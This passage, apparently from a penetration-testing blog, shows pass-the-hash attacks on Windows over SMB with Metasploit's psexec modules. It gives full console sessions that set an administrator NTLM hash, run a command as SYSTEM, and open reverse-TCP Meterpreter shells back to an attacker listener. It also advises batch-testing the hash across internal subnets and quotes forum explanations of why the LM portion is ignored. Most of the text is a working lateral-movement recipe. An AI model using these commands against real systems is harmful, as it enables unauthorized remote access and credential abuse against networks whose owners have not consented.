msf5 > use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > set rhosts 10.211.55.14
rhosts => 10.211.55.14
msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(admin/smb/psexec_command) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
msf5 auxiliary(admin/smb/psexec_command) > set command "whoami"
command => whoami
msf5 auxiliary(admin/smb/psexec_command) > run
[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.211.55.14:445 - checking if the file is unlocked
[*] 10.211.55.14:445 - Getting the command output...
[*] 10.211.55.14:445 - Executing cleanup...
[+] 10.211.55.14:445 - Cleanup was successful
[+] 10.211.55.14:445 - Command completed successfully!
[*] 10.211.55.14:445 - Output for "whoami":
nt authority\system
[*] 10.211.55.14:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The annoying part is that this module does not take a network range for batch verification, so in practice consider the following two modules instead:
exploit/windows/smb/psexec
This one accepts an IP range in rhosts, which makes batch PTH verification convenient. Below is the verification process against a single host:
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 10.211.55.14
rhosts => 10.211.55.14
msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
msf5 exploit(windows/smb/psexec) > set lhost 10.211.55.4
lhost => 10.211.55.4
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.211.55.4:4444
[*] 10.211.55.14:445 - Connecting to the server...
[*] 10.211.55.14:445 - Authenticating to 10.211.55.14:445 as user 'administrator'...
[*] 10.211.55.14:445 - Selecting PowerShell target
[*] 10.211.55.14:445 - Executing the payload...
[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.211.55.14
[*] Meterpreter session 2 opened (10.211.55.4:4444 -> 10.211.55.14:49168) at 2019-11-24 23:42:38 +0800
meterpreter >
Below is the result of batch verification across a subnet; validating a hash this way inside an internal network is quite practical and efficient:
(Figure: screenshot of the batch-verification output across the subnet; not reproduced here)
As for my question about why the first 32 hex characters of the hash have no effect, I asked on the T00ls forum; below are the replies from the masters there:
iceword: The first part is the LM hash. LM hashes have been deprecated and are not used for authentication, so you can put anything there.
Hello_C: NTLM Hash = LM Hash + NT Hash. When the LM hash is aad3b435b51404eeaad3b435b51404ee, the password may be empty or the LM hash is simply not stored; Server 2008 does not store LM hashes by default. PTH uses the NT hash; some tools may require the lm hash:nt hash format, and if there is no LM hash you can pad it with any 32 characters.
安全客: If the password is empty or the LM hash is not stored, the LM hash we dump is AAD3B435B51404EEAAD3B435B51404EE. That is why every LM hash dumped on Win7 is AAD3B435B51404EEAAD3B435B51404EE; the LM hash here has no value.
exploit/windows/smb/psexec_psh
msf5 > use exploit/windows/smb/psexec_psh
msf5 exploit(windows/smb/psexec_psh) > set rhosts 10.211.55.14
rhosts => 10.211.55.14
msf5 exploit(windows/smb/psexec_psh) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec_psh) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
msf5 exploit(windows/smb/psexec_psh) > set lhost 10.211.55.4
lhost => 10.211.55.4
msf5 exploit(windows/smb/psexec_psh) > run
[*] Started reverse TCP handler on 10.211.55.4:4444
[*] 10.211.55.14:445 - Executing the payload...
[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.211.55.14
[*] Meterpreter session 3 opened (10.211.55.4:4444 -> 10.211.55.14:49169) at 2019-11-24 23:44:12 +0800
meterpreter >
This module also supports batch verification across a network range, so I will not repeat that here.